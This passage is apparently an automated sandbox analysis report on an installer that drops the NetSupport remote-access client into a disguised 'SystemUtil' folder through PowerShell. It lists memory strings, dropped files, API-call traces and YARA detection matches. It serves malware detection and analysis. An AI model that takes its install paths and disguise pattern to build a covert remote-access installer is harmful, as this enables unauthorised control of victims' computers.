                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0a
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://sv.symcd.com0&
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://sw.symcb.com/sw.crl0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://sw.symcd.com0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharData
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: http://www.advanced-ip-scanner.com0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.macrovision.com0
                                  Source: client32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                  Source: client32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com
                                  Source: is-BPHN2.tmp.1.drString found in binary or memory: http://www.openssl.org/V
                                  Source: is-BPHN2.tmp.1.drString found in binary or memory: http://www.openssl.org/support/faq.html
                                  Source: client32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                  Source: client32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.radmin.com
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://www.symauth.com/cps0(
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drString found in binary or memory: http://www.symauth.com/rpa00
                                  Source: KC0uZWwr8p.exe, 00000000.00000003.1998537758.0000000000E71000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.uninetutility.com
                                  Source: KC0uZWwr8p.exe, 00000000.00000003.1998537758.0000000000E4D000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1993202352.0000000002ECD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.uninetutility.com/support
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1993202352.0000000002EDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.uninetutility.com/update
                                  Source: KC0uZWwr8p.exe, 00000000.00000003.1998537758.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.uninetutility.com/update)
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1993202352.0000000002EF1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.uninetutility.comQV
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://xml.org/sax/features/namespaces
                                  Source: is-0LL3Q.tmp.1.drString found in binary or memory: http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech
                                  Source: powershell.exe, 00000003.00000002.1912534174.00000000045D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                  Source: powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.dr, pcicapi.dll.3.drString found in binary or memory: https://d.symcb.com/cps0%
                                  Source: is-BPHN2.tmp.1.dr, pcicapi.dll.3.drString found in binary or memory: https://d.symcb.com/rpa0
                                  Source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: https://d.symcb.com/rpa0)
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drString found in binary or memory: https://d.symcb.com/rpa0.
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: KC0uZWwr8p.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                                  Source: powershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                  Source: powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                                  Source: KC0uZWwr8p.exe, 00000000.00000003.1647342710.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.exe, 00000000.00000003.1648007586.000000007EB2B000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000000.1649520541.00000000004C1000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.innosetup.com/
                                  Source: KC0uZWwr8p.exe, 00000000.00000003.1647342710.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.exe, 00000000.00000003.1648007586.000000007EB2B000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000000.1649520541.00000000004C1000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.remobjects.com/ps
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,7_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,7_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11032930 GetClipboardFormatNameA,SetClipboardData,7_2_11032930
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,8_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11032930 GetClipboardFormatNameA,SetClipboardData,8_2_11032930
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11031AC0 IsClipboardFormatAvailable,GetClipboardData,GlobalSize,GlobalLock,_memmove,GlobalUnlock,7_2_11031AC0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11007720 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,7_2_11007720
                                  Source: Yara matchFile source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4008, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 2004, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7072, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL, type: DROPPED

                                  Spam, unwanted Advertisements and Ransom Demands

                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,7_2_11112840
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,8_2_11112840

                                  System Summary

                                  Source: amsi32_5448.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Source: Process Memory Space: powershell.exe PID: 5448, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\remcmdstub.exe
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeProcess Stats: CPU usage > 49%
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110A9240: DeviceIoControl,7_2_110A9240
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1115A340 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,7_2_1115A340
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102CE2D
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07FD38023_2_07FD3802
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110292307_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110724607_2_11072460
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1115B1807_2_1115B180
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1107F5207_2_1107F520
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1101B9807_2_1101B980
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1115F9F07_2_1115F9F0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1101BDC07_2_1101BDC0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11163C557_2_11163C55
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110504307_2_11050430
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110088DB7_2_110088DB
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1101CBE07_2_1101CBE0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11032A607_2_11032A60
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11086DA07_2_11086DA0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11044C607_2_11044C60
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_6859A9807_2_6859A980
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685C49107_2_685C4910
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685C39237_2_685C3923
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_6859DBA07_2_6859DBA0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685C3DB87_2_685C3DB8
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685CA0637_2_685CA063
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685C41567_2_685C4156
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685913107_2_68591310
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685B43C07_2_685B43C0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685A84F07_2_685A84F0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685C45287_2_685C4528
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685917607_2_68591760
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_688609157_2_68860915
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_688009197_2_68800919
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_6881EB1A7_2_6881EB1A
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1115B1808_2_1115B180
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110292308_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1107F5208_2_1107F520
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1101B9808_2_1101B980
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1115F9F08_2_1115F9F0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1101BDC08_2_1101BDC0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11163C558_2_11163C55
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110504308_2_11050430
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110724608_2_11072460
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110088DB8_2_110088DB
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1101CBE08_2_1101CBE0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11032A608_2_11032A60
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11086DA08_2_11086DA0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11044C608_2_11044C60
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeProcess token adjusted: Security
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 685A7A90 appears 62 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 685930A0 appears 54 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 11142A60 appears 1055 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 685BF3CB appears 33 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 685A7C70 appears 36 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 1116B7E0 appears 54 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 111434D0 appears 42 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 11160790 appears 64 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 685A7D00 appears 135 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 685B9480 appears 60 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 68596F50 appears 171 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 11080C50 appears 64 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 1115CBB3 appears 92 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 110290F0 appears 1919 times
